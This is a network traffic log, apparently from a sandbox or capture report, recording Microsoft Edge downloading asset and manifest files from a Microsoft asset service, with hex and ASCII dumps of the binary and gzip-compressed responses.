2024-11-09 01:47:33 UTC	746	OUT	Data Raw: 7b 22 69 64 65 6e 74 69 74 79 22 3a 7b 22 75 73 65 72 22 3a 7b 22 6c 6f 63 61 6c 65 22 3a 22 65 6e 2d 47 42 22 7d 2c 22 64 65 76 69 63 65 22 3a 7b 22 69 64 22 3a 6e 75 6c 6c 2c 22 63 75 73 74 6f 6d 49 64 22 3a 6e 75 6c 6c 2c 22 6f 6e 6c 69 6e 65 49 64 54 69 63 6b 65 74 22 3a 6e 75 6c 6c 2c 22 66 61 6d 69 6c 79 22 3a 33 2c 22 6c 6f 63 61 6c 65 22 3a 22 65 6e 2d 47 42 22 2c 22 6f 73 56 65 72 73 69 6f 6e 22 3a 22 31 30 2e 30 2e 31 39 30 34 35 2e 32 30 30 36 2e 76 62 5f 72 65 6c 65 61 73 65 22 2c 22 62 72 6f 77 73 65 72 22 3a 7b 22 69 6e 74 65 72 6e 65 74 5f 65 78 70 6c 6f 72 65 72 22 3a 22 39 2e 31 31 2e 31 39 30 34 31 2e 30 22 7d 2c 22 6e 65 74 4a 6f 69 6e 53 74 61 74 75 73 22 3a 32 2c 22 65 6e 74 65 72 70 72 69 73 65 22 3a 7b 7d 2c 22 63 6c 6f 75 64 53 6b Data Ascii: {"identity":{"user":{"locale":"en-GB"},"device":{"id":null,"customId":null,"onlineIdTicket":null,"family":3,"locale":"en-GB","osVersion":"10.0.19045.2006.vb_release","browser":{"internet_explorer":"9.11.19041.0"},"netJoinStatus":2,"enterprise":{},"cloudSk
2024-11-09 01:47:33 UTC	252	IN	HTTP/1.1 200 OK Date: Sat, 09 Nov 2024 01:47:33 GMT Content-Type: application/octet-stream Content-Length: 460992 Connection: close Server: Kestrel ETag: "638004170464094982" Request-Context: appId=cid-v1:3d5e3eff-de07-43c3-a15d-06b05ff513c8
2024-11-09 01:47:33 UTC	16132	IN	Data Raw: 00 01 b7 32 6c 49 bd 35 18 3c 43 00 3b d3 7b 9a 00 08 16 f5 5f 2b 6a 45 e7 a6 60 9a c2 7d 9c 16 00 0c 2d 9e cc 04 23 e9 41 f4 82 16 a9 4b 52 db 00 0c 6c e3 4d 30 2c 73 87 bc fb 29 94 39 d4 c2 00 0c b4 d9 e2 eb e5 8f d8 b5 78 ca fa c6 82 9e 00 0c da 46 f1 62 1d cd 1e ab c5 cd 6a 55 ed dc 00 0e 79 d2 8a 68 27 a0 d5 e5 e5 89 bf 4c 3c 1f 00 12 2a 1f c4 5a 99 f8 2a 25 e9 2a 92 1a f6 5f 00 14 b2 67 12 34 79 75 12 bc d6 99 a8 99 1c cc 00 14 c8 bf 10 27 63 3d b9 cd 49 30 99 bf d3 a1 00 17 f8 9d 81 a3 94 71 57 f8 bf 3c 3a 4e ba d2 00 1a 3c bc a6 55 f9 2c 4d 69 94 e9 c9 5f b9 8c 00 1f 17 b3 27 28 0e f5 55 df 39 10 21 05 ce 96 00 1f bc ff bf d8 75 92 d1 13 89 37 0b 86 dc 34 00 20 98 bc 45 61 f8 b8 0d 34 2e 2b fb 37 39 6b 00 21 54 ca 2d 35 57 fb 9f 21 b8 d7 9a 40 2b Data Ascii: 2lI5<C;{_+jE`}-#AKRlM0,s)9xFbjUyh'L<Z%*_g4yu'c=I0qW<:N<U,Mi_'(U9!u74 Ea4.+79k!T-5W!@+
2024-11-09 01:47:33 UTC	16384	IN	Data Raw: b8 6c 65 b5 81 d7 e8 96 a2 f6 fb f5 08 e9 4a 27 41 5a ef 9e 20 88 b1 dd 92 43 f1 c7 08 f6 31 2a b4 6b b0 d0 7b af f2 6e c0 3b 30 49 08 f7 14 46 2e c2 8e a1 9b 56 f6 89 ff 89 a1 a1 08 f8 86 49 94 74 f7 df c7 92 d3 f1 d5 09 db a4 08 f9 bb 85 2c 48 b7 6a b2 fe 9c 06 4c 91 ba af 08 fb 12 e5 67 95 f2 51 95 31 42 c4 14 92 6c 77 08 fb aa 20 c5 0c 96 4a 9a 6f 2e 40 d4 2b fd 90 08 fe aa 92 f9 b3 b3 8f b8 65 27 9b b9 df 14 f7 09 00 34 db 44 0d dd 66 70 53 8f 0b 31 18 8b ba 09 05 38 28 fa 80 5f eb 56 83 46 d1 dd 83 34 b7 09 06 35 0d 42 c1 3f 91 ee 97 ed f4 31 68 37 32 09 08 35 c9 14 24 10 2f b5 80 ac f7 9a 16 e6 e2 09 08 7a 82 38 a3 08 0b 00 2c 62 9c d0 2e d2 c4 09 09 d1 da a7 a8 16 cd 89 e5 ac fe b9 cc 8e 69 09 0e 20 d3 38 58 e2 6b 84 a1 e7 75 97 ad 75 61 09 0e 4d Data Ascii: leJ'AZ C1*k{n;0IF.VIt,HjLgQ1Blw Jo.@+e'4DfpS18(_VF45B?1h725$/z8,b.i 8XkuuaM
2024-11-09 01:47:33 UTC	16384	IN	Data Raw: 88 ca 0d 74 ff b7 03 d5 0b 17 29 2e 12 86 39 8d 65 51 d1 6b 43 f6 37 a6 5e 4e 7e d5 12 8c a6 4c a1 b4 9a f4 6b 69 49 eb 0d 33 90 eb 12 8f 60 36 ec 98 cd 7f 6a 59 fe c5 d1 d5 4b 38 12 92 da 96 3e 8a fd ee fb c5 ac d0 29 b4 8e 13 12 95 25 87 d8 33 f2 c0 16 e8 0f 63 67 d6 78 d1 12 96 03 01 99 d8 95 ea 2c 0a f8 85 62 05 db 93 12 96 52 aa 59 60 de e6 e9 8c 23 d4 b7 c1 34 3d 12 96 bf ae d0 b9 c2 92 db f1 41 07 61 b1 82 5d 12 97 53 89 b5 7c fd 88 82 19 c7 b1 b0 0f af ed 12 98 30 32 6a a5 03 4e 26 db 95 be 1b a9 a3 e2 12 9a ea fe 35 92 c8 f4 3b 7a 18 36 80 cb 78 bf 12 9b 33 a3 9e d9 7b 54 c8 7b da 3b ed a8 dd 25 12 9b 98 d3 83 cc 49 8e 52 58 13 7e 3f 04 d9 af 12 9c 0d 11 dc 93 65 32 c4 f0 f6 a9 12 25 13 25 12 9c 28 31 10 8a f9 38 40 df 1f 08 9f 08 d4 71 12 9f 71 Data Ascii: t).9eQkC7^N~LkiI3`6jYK8>)%3cgx,bRY`#4=Aa]S\|02jN&5;z6x3{T{;%IRX~?e2%%(18@qq
2024-11-09 01:47:33 UTC	16384	IN	Data Raw: 8c e6 1b 88 d1 53 7d a1 f2 bc f6 d3 1b bd 38 be aa 88 bb f2 1c 05 de ac 2c b3 63 c3 1b bf d8 bc e5 a8 4c 42 a1 5e 7d 76 56 07 18 dd 1b c1 05 6e 7a a0 f3 27 8e eb 4f 29 e6 e0 a0 2a 1b c2 a1 45 60 4f 19 d0 fa 94 66 c2 31 56 e0 ac 1b c3 58 61 04 7c 91 76 1b 27 0c 2e 05 4d 26 17 1b c4 0f 81 e0 48 ff 13 e9 e7 fd ae 77 76 47 85 1b c5 d5 9a 68 ef 46 53 52 de 8b 1c 3a 7b 4f 53 1b cc c2 c4 df 4d dc 18 9f 1a a6 aa 47 f5 9f 2e 1b cd 8c 32 11 55 08 6c 9c 2f 0b 09 34 58 ca d2 1b cf 2c 48 15 0b dd b9 a9 cc 90 e8 14 76 e1 c7 1b d1 50 e1 1f 03 b2 ff 0f ab b3 c3 a2 cf c2 1a 1b d6 7a 97 41 b9 a0 2a 37 7b ba 9a 0a 00 47 56 1b da a2 08 31 23 96 3c 24 0a b0 10 2f 5e b6 c3 1b dc 15 6b ce f9 b8 64 db f8 fb 84 2a d6 02 9b 1b dc 58 1e e3 44 3f fb c2 e7 7f 97 d4 41 5f 1c 1b dc 83 Data Ascii: S}8,cLB^}vVnz'O)E`Of1VXa\|v'.M&HwvGhFSR:{OSMG.2Ul/4X,HvPzA7{GV1#<$/^kd*XD?A_
2024-11-09 01:47:33 UTC	16384	IN	Data Raw: 9c f0 8f 05 68 32 cf 23 af 0f e9 31 25 17 e2 83 8c a0 e0 45 41 22 69 ae 51 16 97 9e 25 19 94 88 65 65 22 da 5c e4 68 67 07 cf 5f 7a 25 1e 6a 2e 6e bf 40 39 a7 91 dd 9f 82 5c b4 be 25 21 01 14 90 ab fe fa c5 d4 0a 62 0b cd 30 e1 25 21 03 7a 48 db 3d 1f b8 bc 66 91 12 c8 41 7f 25 24 00 6f 09 69 7b 22 bc d0 5a 82 9d c8 cb 00 25 24 76 95 60 1f 20 bf 51 8e ef 43 af 74 27 17 25 24 d0 90 ec 4d 35 f3 3b 75 d1 b6 56 62 63 3e 25 25 bd 14 86 f0 f0 dc 12 c9 55 32 f1 85 66 4f 25 25 de ea a2 0c 7b b9 31 02 c3 fc 10 0f 92 23 25 27 0a 2e 12 37 63 79 36 e7 03 6f 4c 1e 67 7e 25 29 ef 20 dd 60 cb e0 1f 91 82 96 c4 38 ef d3 25 2c 0d 19 1e 65 a3 27 9b 58 e2 44 e3 80 93 37 25 2c e2 18 e3 78 51 0e b2 f9 62 26 e5 78 8f 9f 25 36 84 bd bb 8f cc a6 bc 42 a8 bf 22 b0 f1 a9 25 3a 54 Data Ascii: h2#1%EA"iQ%ee"\hg_z%j.n@9\%!b0%!zH=fA%$oi{"Z%$v` QCt'%$M5;uVbc>%%U2fO%%{1#%'.7cy6oLg~%) `8%,e'XD7%,xQb&x%6B"%:T
2024-11-09 01:47:33 UTC	16384	IN	Data Raw: b6 07 8f 44 9d 29 36 4f 29 8a 7d 80 2e 1d 98 b7 c7 17 54 cd a1 2b c2 e9 29 21 98 f9 2e 1f 4a 0d ee 13 3f 5a 00 ff e7 0d f0 d4 1c 86 2e 21 27 d4 ff 4a 83 22 1e 86 3f 93 6b 62 a1 0e 2e 25 e1 37 a1 70 d4 f6 b3 17 bd e9 dd 8d 2a 44 2e 26 32 0d f4 82 4c f6 14 9e 97 92 23 fa 52 37 2e 2a 40 96 f4 4d 34 89 21 f2 49 39 e8 d3 d3 19 2e 2b ef 39 f1 8a 4a 7e 28 b9 d0 be 00 6f 35 68 2e 2e 95 d3 bd e3 e7 a0 d6 d0 25 5e 0d b7 b5 a5 2e 31 ce 53 a9 54 e0 3b 3c 2f fc 4d eb 0f a5 e1 2e 33 1e 46 e8 3a 01 30 91 17 49 f3 33 11 46 79 2e 36 b7 bb 07 e4 6d 92 d5 42 49 d7 e5 49 f4 85 2e 36 e8 96 57 36 97 bb 40 7a 3b ca 8a e0 7e 53 2e 3a 1e f2 97 75 d6 ae 4f f5 85 eb 36 38 65 e5 2e 3a 59 df c9 6e 75 92 ac 40 ac 59 a6 fd e4 1c 2e 3b 8e 5c 94 1d 75 39 54 06 13 6b 6e 7f ef 30 2e 43 e8 Data Ascii: D)6O)}.T+)!.J?Z.!'J"?kb.%7pD.&2L#R7.@M4!I9.+9J~(o5h..%^.1ST;</M.3F:0I3Fy.6mBII.6W6@z;~S.:uO68e.:Ynu@Y.;\u9Tkn0.C
2024-11-09 01:47:33 UTC	16384	IN	Data Raw: 02 f3 ca e4 05 cb a0 be 15 69 62 32 37 3c 37 3b db 81 8a b2 df cf ef b1 79 3f f8 ae 37 3d a3 01 e8 95 76 a1 63 78 77 2e 93 42 3d 4f 37 3e c4 08 a5 37 4f 84 43 dc 19 00 a9 8f 2e 0d 37 3f 82 55 cb cd 06 b9 0c 0d 94 f9 4f d6 82 e8 37 44 09 28 b8 33 ef b7 ee 6b 4c 90 ee e0 d1 3a 37 44 83 9a 56 2d 6a 58 ea 6b e5 8f 6a 1d 17 23 37 47 0f 55 f8 2b 1c 30 89 3a 1d e2 21 89 b7 42 37 4b 86 38 d0 cd 9f 96 62 d8 da bf d5 15 ed cb 37 4e 81 34 2b 0e ea ab 6f ae 29 15 59 32 ae 46 37 50 d2 0c 2a e2 ca 59 ec 21 86 70 f9 7a 6c d1 37 55 32 b2 91 f0 e7 b8 47 d0 f7 0f 64 90 d9 51 37 56 ce 44 24 61 58 d7 f8 d4 0d 8b fe 3d b0 27 37 58 1f 24 d2 a5 24 9c d7 5c 5a 71 f9 e9 f2 a3 37 58 9d d0 f0 06 3a 05 be 08 d9 90 bc 18 0d 71 37 5d 04 71 81 05 8e b6 9b 24 f2 54 35 1b 18 46 37 62 eb Data Ascii: ib27<7;y?7=vcxw.B=O7>7OC.7?UO7D(3kL:7DV-jXkj#7GU+0:!B7K8b7N4+o)Y2F7P*Y!pzl7U2GdQ7VD$aX='7X$$\Zq7X:q7]q$T5F7b
2024-11-09 01:47:33 UTC	16384	IN	Data Raw: 30 9b b9 2f 98 88 40 3b cc 98 d2 59 40 6d c4 d7 67 2a f1 8a f6 d5 d3 92 a9 c6 13 1d 40 71 5f 29 26 14 e2 86 f2 b1 3c d6 fc 07 07 4a 40 77 d4 86 06 be 80 6f b2 fd e4 19 fe 6b 6a 94 40 78 4d f5 b9 67 58 78 83 29 63 04 29 22 98 8d 40 7a 85 3f 10 18 78 19 d3 be 45 8d 0e 49 7b bb 40 7b 5d c5 55 97 e5 9d 35 9d 27 93 51 1d be 21 40 7d 42 88 f1 ca 9d ba 2a 28 3a f8 72 71 ba c7 40 7e 4d cf f4 13 b8 8f f1 9c e6 e4 a8 50 74 d0 40 80 bb 51 db 04 52 b7 b2 f3 5f dc db 6d 4b de 40 88 e2 91 a0 6c 67 8c d2 0b 9f d2 91 ca 6d 22 40 8a b9 d3 6a f9 07 64 05 ea 52 dc 44 82 0b 38 40 8b 54 ce 67 df 8c a3 48 2d 96 f6 ed e4 cf 78 40 8e 78 fd f9 d7 db ac 12 a0 80 27 db 9f 14 42 40 90 00 78 66 ff 66 2b 58 9f 18 13 aa 3d 6e b3 40 90 fa a1 0b 8e ee 2b 73 4b 59 c6 c9 b1 84 9b 40 93 53 Data Ascii: 0/@;Y@mg@q_)&<J@wokj@xMgXx)c)"@z?xEI{@{]U5'Q!@}B(:rq@~MPt@QR_mK@lgm"@jdRD8@TgH-x@x'B@xff+X=n@+sKY@S
2024-11-09 01:47:33 UTC	16384	IN	Data Raw: 66 82 7d 26 60 5e 84 ec 72 2a af 39 49 bb 12 c2 0a 6a 68 a1 f1 aa 3c 93 f9 79 13 0e 49 bb 81 dd 8c 7e 5d 19 6b 54 60 33 c1 1e 70 56 49 bc df 84 ed 14 a3 5d 07 06 25 84 6a 95 02 e0 49 bd eb 48 24 83 1e f1 e0 29 fe 9e e6 22 da 07 49 c1 2d 65 e8 79 f6 32 c8 9b 5b 3f 1a a8 9d b9 49 c4 33 af 97 7a e9 a1 ba ed 12 d0 a3 40 1e 42 49 c5 09 f1 9f 2c bb 61 75 14 cf 80 9c 0e 85 9e 49 c8 81 16 cb ae 60 54 25 eb 75 fe e4 b5 16 8c 49 cc 62 7c 10 80 46 f7 71 86 18 7b bd ea 45 5f 49 cd ad e9 e7 ee e9 a2 7e 24 2e 10 93 70 b0 ad 49 d1 bc ac 01 05 b1 9b be b4 f8 4e e6 0c 0d ac 49 d2 4b be 25 0a bd 70 d0 f7 10 c2 d7 38 8b f2 49 d4 c5 71 4c 7f 7a 2a 83 c3 c3 50 d2 c2 4c 3e 49 d5 40 eb ee b7 40 f4 16 fe b4 e7 35 d0 25 e3 49 d6 e7 89 68 04 ba a1 f5 37 3f 51 0a 5e cc 25 49 da b4 Data Ascii: f}&`^r9Ijh<yI~]kT`3pVI]%jIH$)"I-ey2[?I3z@BI,auI`T%uIb\|Fq{E_I~$.pINIK%p8IqLzPL>I@@5%Ih7?Q^%I

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
97	192.168.2.7	53013	13.107.246.57	443	1792	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-09 01:47:33 UTC	470	OUT	GET /assets/edge_hub_apps_manifest_gz/4.7.107/asset?assetgroup=Shoreline HTTP/1.1 Host: edgeassetservice.azureedge.net Connection: keep-alive Edge-Asset-Group: Shoreline Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-09 01:47:33 UTC	577	IN	HTTP/1.1 200 OK Date: Sat, 09 Nov 2024 01:47:33 GMT Content-Type: application/octet-stream Content-Length: 306698 Connection: close Content-Encoding: gzip Last-Modified: Tue, 10 Oct 2023 17:24:31 GMT ETag: 0x8DBC9B5C40EBFF4 x-ms-request-id: 6d5c7e92-401e-0049-21b4-2e5b67000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob x-azure-ref: 20241109T014733Z-16547b76f7frbg6bhC1DFWr5400000000ab000000000gxnh Cache-Control: public, max-age=604800 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-09 01:47:33 UTC	15807	IN	Data Raw: 1f 8b 08 08 cf 88 25 65 02 ff 61 73 73 65 74 00 ec 7d 69 93 db 46 92 e8 5f a9 f0 97 fd e0 96 05 10 00 09 4c c4 8b 17 2d f9 92 6d f9 92 6d 8d fd 66 43 51 00 0a 24 9a 20 40 e1 60 ab 7b 76 fe fb ab cc 2c 10 09 82 07 c8 a6 bc 9e 8d 0d 5b 68 b0 8e bc eb 44 55 e6 3f 3f 59 c9 3c 4d 54 55 bf db a8 b2 4a 8b fc 93 bf 89 4f dc cf ac cf ac 4f 6e c4 27 8b 26 7c 27 d7 eb 4a 27 fe bf 7f 7e 92 c6 90 19 c5 ee d4 f7 65 f0 4c f9 be ff cc f5 95 7c 26 63 df 7e 36 9b da 81 13 7b d3 d0 0e 15 d4 cd e5 4a 41 f9 77 ef 5e bf f9 ea 1d fc 7a f7 0e d2 19 1e fb 33 fd df 0c 12 63 55 45 65 ba ae 4d 06 d5 61 89 54 75 a9 1e 20 f7 f5 ab 57 2f 5e dd dd 7e ff 62 be 7c bf 58 a6 5f 05 f7 d6 8b db 9f be f8 f2 f6 f6 87 97 b7 3f f9 b7 90 ff 72 fe ad 7e ff e2 76 9d 58 77 ee 57 8b 1f de ff 14 f9 fe Data Ascii: %easset}iF_L-mmfCQ$ @`{v,[hDU??Y<MTUJOOn'&\|'J'~eL\|&c~6{JAw^z3cUEeMaTu W/^~b\|X_?r~vXwW
2024-11-09 01:47:33 UTC	16384	IN	Data Raw: 04 ba b8 75 26 ce 55 c2 08 bf 5c 90 e7 68 0d 8c 7c 07 bb 14 ee 07 cf ac 5b ca 81 54 5b 25 f6 36 51 93 15 e8 c2 2b 22 50 fc 52 36 6d 55 35 59 19 67 e4 56 be d8 2d df fd 8c 1c b1 48 e9 85 d8 d5 6f a1 88 16 05 b8 ea d5 42 20 2f c6 fa c5 ab 21 ae b4 7e 71 4c 7c 69 3b da be 2c c4 3c 45 31 58 f6 5a d0 75 29 2d 10 91 2f b6 81 a8 f1 77 27 4d cb 46 c3 d1 f2 cb e7 17 7d 3c d0 6a 30 b1 ed 19 11 24 85 30 ed b3 77 98 0a a3 d3 4d 8a a4 58 a6 1a 92 6f 39 a0 66 5b a9 58 c4 f8 d7 db 13 a4 38 9f 53 18 72 e3 d6 58 c9 9c 2a 85 f1 21 3d 9d 12 35 51 d6 f4 74 9e 6e f9 3a 6f 4c fc e5 2c 53 f9 7a 94 a9 7c 50 ab 8e d8 56 01 86 95 11 92 ce 4d 82 a9 12 26 c6 7f 9c 55 b4 0d eb a8 c4 4f 75 f1 df 12 7e 7b 85 2d 18 bd 99 6f 4d 95 18 8d 35 7f b9 51 da bc b3 17 f2 61 66 41 16 70 9d 0a 0c Data Ascii: u&U\h\|[T[%6Q+"PR6mU5YgV-HoB /!~qL\|i;,<E1XZu)-/w'MF}<j0$0wMXo9f[X8SrX*!=5Qtn:oL,Sz\|PVM&UOu~{-oM5QafAp
2024-11-09 01:47:33 UTC	16384	IN	Data Raw: b7 2c 9c d4 28 cd 82 09 ad 54 24 d2 ae 26 b9 4f 37 c4 67 1e 9d 6b d1 e4 03 44 91 0f c7 24 3e 9c a5 f8 80 ce e1 c3 bd 55 1f 7c 0d 7d f0 d6 f4 e1 f6 6d f9 6c 42 78 a7 7a 8f cf 80 2a 42 b1 ca af 46 95 01 06 85 53 be 7a 50 c8 12 ce 7e 7c 44 29 29 63 83 14 66 50 e5 69 9e ba 94 a2 14 a9 44 53 56 22 78 06 d0 d3 7d 25 3d 51 7e fc 63 e8 77 69 11 9c 24 cb 92 42 e9 e0 d4 ac cc c6 c2 0a 92 55 72 f4 61 88 91 31 1f 4c 69 b4 9b 0f a5 64 32 91 6a 99 5a 87 05 9b b8 18 4d b6 69 0c 05 60 46 80 c2 34 75 85 d5 88 cf a4 31 10 78 28 99 44 01 7e 6d 51 37 26 3d f1 aa c8 64 77 98 90 c3 4a 88 b9 d5 8c 73 bc 9b 5c 69 65 23 a6 fb 16 9b 26 25 05 ac fc cc 1e 87 56 e3 bd 7f 86 8d d9 de 4d 93 29 aa 7c fe d1 06 5b da c5 90 55 b0 c9 33 35 1b d9 51 ad b2 ea c6 9a c4 a2 90 04 54 de 86 42 2d Data Ascii: ,(T$&O7gkD$>U\|}mlBxz*BFSzP~\|D))cfPiDSV"x}%=Q~cwi$BUra1Lid2jZMi`F4u1x(D~mQ7&=dwJs\ie#&%VM)\|[U35QTB-
2024-11-09 01:47:33 UTC	16384	IN	Data Raw: 2a 42 7f 7e 14 be 1b ef d2 39 b9 d3 a0 0f a6 db fd c0 cf 6a 73 b5 e6 a0 67 39 bd 50 cf ce e5 f5 33 b4 5b f6 96 18 f6 1d 3d 5b 1c 62 ee 08 9c b4 27 31 5c bf 95 0d 07 a0 cf bc bf ec e9 f3 e3 25 7d d1 cd 7e e8 fe 69 3f 94 32 74 6d 41 40 30 f4 9d 21 ef 18 ab 09 e0 e5 30 bf 56 97 43 99 8d fb 5c b1 3a 15 2a 0c 9d 5f c9 d3 47 70 60 b0 6e 17 9c 16 bc 33 94 8f dc 87 1c 2e 65 5f 80 b0 c7 e2 bb 6a f4 3b c8 60 00 83 b2 83 02 16 e1 3f 69 68 e4 62 45 17 99 ba 9d 9d b7 00 7d 2a 5a 5f 88 af 8b 22 5d 84 79 61 b8 38 c9 2f d4 62 3c 2f ee 0a 38 04 98 69 d8 af 45 cf 43 a8 9b 3e 6e dd 69 b8 01 0b 4d c5 2a d4 d8 5d 7a b1 5f 94 d0 5d 79 e7 c9 87 c6 d5 b9 5d 89 1b 44 f3 5a 14 67 85 e9 1a ef c2 74 b9 63 86 3e c2 71 a7 08 94 eb 44 58 ad 1a 5c 09 02 5c 4d 1b c8 2c 53 c1 71 b8 50 80 Data Ascii: B~9jsg9P3[=[b'1\%}~i?2tmA@0!0VC\:_Gp`n3.e_j;`?ihbE}Z_"]ya8/b</8iEC>niM]z_]y]DZgtc>qDX\\M,SqP
2024-11-09 01:47:33 UTC	16384	IN	Data Raw: c2 6b ad 8a 70 f5 34 6b b8 40 3f ab 6c ff 6b b9 2f c1 49 79 7f 7f fe e2 4d 8e 52 97 9f 5c d2 a4 d2 9b 7f 21 19 ca ff db 31 e3 e4 f2 51 b8 7c 74 b3 4c aa e5 59 09 49 a3 cf 51 d6 87 a5 4c 6d 23 e7 30 3b 3e ce a2 ff dd d2 a2 4d 1f 0e 14 fd d7 52 7f fd 1c ea cf 13 55 dc a3 6d 85 4b 4e 63 b4 12 03 65 33 26 36 bd 72 f4 19 04 1a d9 86 f6 84 1c dd 9e ee 21 e8 65 4d aa 2f f0 f8 0a fb d1 85 1e 53 4d 3f 5f a5 fc d4 0d f8 28 79 f7 b1 c1 a5 fc 51 df bc 30 df bf cb 6f cb 2a 09 d7 1f 99 f4 19 6a 7e d9 a5 f8 7e 7b c5 59 31 55 b2 99 9f 7d 02 06 e8 6e c6 98 ec a9 7c 3f 2a 1d 34 e5 bd 0a 8f e7 88 3e 74 c3 0b e7 6b 10 2c 4f 53 5d 7c 86 e2 09 77 99 7d ee 02 3a 9d f3 a7 29 a2 13 79 ee 15 d2 a7 37 fd 67 b6 f7 67 33 72 df b2 23 59 ef 55 5d e5 6f cb 55 7e 43 6c b7 99 fc 2e 56 9e Data Ascii: kp4k@?lk/IyMR\!1Q\|tLYIQLm#0;>MRUmKNce3&6r!eM/SM?_(yQ0oj~~{Y1U}n\|?4>tk,OS]\|w}:)y7gg3r#YU]oU~Cl.V
2024-11-09 01:47:33 UTC	16384	IN	Data Raw: 1d c0 e5 f5 0e 81 86 cd d1 7b 9c 8b 16 07 4d 31 65 8e 49 77 c3 9c 0b 06 79 cd 66 e0 72 84 3b 54 b9 74 ef 35 53 7d 3b 8c b0 a9 fd 1b 50 a9 de 74 45 72 7e 1b f0 2a c4 ee 75 56 a9 f1 4f 0b e2 ef 4c 0e 04 e6 c1 13 43 d1 a3 91 83 19 d3 3d c4 08 0f b5 d5 e1 f0 41 7b 02 cf 94 80 35 8c 5f 5f 02 90 85 fa 86 bb ab e1 02 93 a8 c3 01 b8 10 ce 1a 84 70 ba 2a 74 48 e2 74 7c 83 87 f5 42 38 70 15 c2 ce 65 08 08 86 a0 47 21 98 5b b8 58 62 21 c8 96 0d 6c 09 61 e7 32 c4 b3 5e a1 8d a0 20 7d 39 b0 28 5c c6 6d 21 84 b7 80 4c dc 70 c4 2e c4 f3 19 21 9c 8e d6 1f 96 d8 f4 9d 32 40 37 a4 47 84 1e d1 c7 65 89 5f 63 82 1d d4 5a 86 2d e5 f8 15 59 45 61 ea 67 ab 2d d9 61 85 e3 91 0f 94 e7 67 25 02 3d 4f 28 55 ad 17 c6 a0 29 6a 5d 21 2a cd 7e af 45 5e 0b 01 e5 6c bb ed 07 fa bc 5c f7 Data Ascii: {M1eIwyfr;Tt5S};PtEr~uVOLC=A{5__ptHt\|B8peG![Xb!la2^ }9(\m!Lp.!2@7Ge_cZ-YEag-ag%=O(U)j]!*~E^l\
2024-11-09 01:47:33 UTC	16384	IN	Data Raw: b4 4f 20 01 c9 6e d7 8b d6 eb 26 ee 09 6d 06 c3 c0 20 42 f6 62 01 a8 b8 2e 41 68 d5 3e af 78 77 09 5e a1 a8 7e 3d bf 65 90 da ff 6d 58 c3 e3 86 29 f6 22 00 98 2a 9c 68 97 65 63 ac 5c ad 09 2b 23 82 8f 3f 2b 34 4c 1f 01 76 0d 06 ed 44 0f a9 a0 b1 63 30 c2 0d f2 ad 15 f9 9d a6 73 4a 64 c6 38 b2 91 d1 0a 38 ec f1 61 a5 51 a1 65 d6 96 da 34 5b b9 be df 70 92 06 98 c1 37 67 b8 7a fd 34 cd 5e 44 c0 aa b0 27 6e 0c f2 e2 f9 5e 7c 0a 17 b4 b4 16 73 66 52 b2 05 40 56 84 20 c3 90 88 0a 5a 8e f1 3d 96 59 b7 5f a7 63 31 3c 17 3a a9 04 30 4b 80 0e 09 8b 60 e1 5d df da 55 e1 6d 20 56 de 3a 5a 4e 4e 36 25 71 5c 12 7e f1 93 97 31 94 a1 29 89 f2 0a 40 a9 02 bf 55 03 2f 98 74 5f 78 73 cb c5 29 4c e9 ad ef d3 e0 e9 ec 15 b9 9a 03 cf 91 db 7e f5 f0 08 3e bd 4a a1 b3 a7 63 d1 Data Ascii: O n&m Bb.Ah>xw^~=emX)"*hec\+#?+4LvDc0sJd88aQe4[p7gz4^D'n^\|sfR@V Z=Y_c1<:0K`]Um V:ZNN6%q\~1)@U/t_xs)L~>Jc
2024-11-09 01:47:33 UTC	16384	IN	Data Raw: e6 2c b7 a9 5c 69 a3 75 af d9 ba f6 11 ea 58 64 70 1a 03 5a 75 5c b5 f2 6d d4 e3 16 ed 7d 0a 76 94 c1 8e a7 30 9e 08 64 07 27 9d 18 c0 52 7d e4 67 ff 5d dd ba 83 b1 dc 5d 98 95 9f fd f7 4f 5a 26 c7 8a 7a a4 2b 67 ea ac d1 ee 4b f3 ee 5b 7c 55 87 5f ce 64 5a d1 d6 85 f4 9d 84 43 1d a5 d1 4e 33 c2 52 b6 ac ef d9 7f de 15 61 44 a2 b6 4f fe 03 39 27 95 29 d1 71 16 47 ff 7e 40 2f ff 09 6e 49 c5 ba 2c 58 72 fd b4 fc 2b 2f d4 a3 80 7f e2 4e fd ca 3b f8 f4 09 87 9a 38 33 24 7f 45 a2 7e d3 4f 4e 87 8c cb 8b 02 7f df 7f ff 57 75 a1 22 3d 51 a9 78 41 7d 1b c5 f8 9b d0 7f 72 fc 7d ff 85 6a 70 ab 5e dc aa 41 ca 56 bd b0 55 00 76 02 c7 a0 ea 57 7d b2 c3 fb 0a b5 58 bd 1f ab f6 63 d5 ec bd 82 b3 c7 5f d5 89 ed 15 3f f6 0a e5 7d 86 bf 7b f2 4f 82 f3 1a ea 09 06 a9 c9 03 Data Ascii: ,\iuXdpZu\m}v0d'R}g]]OZ&z+gK[\|U_dZCN3RaDO9')qG~@/nI,Xr+/N;83$E~ONWu"=QxA}r}jp^AVUvW}Xc_?}{O
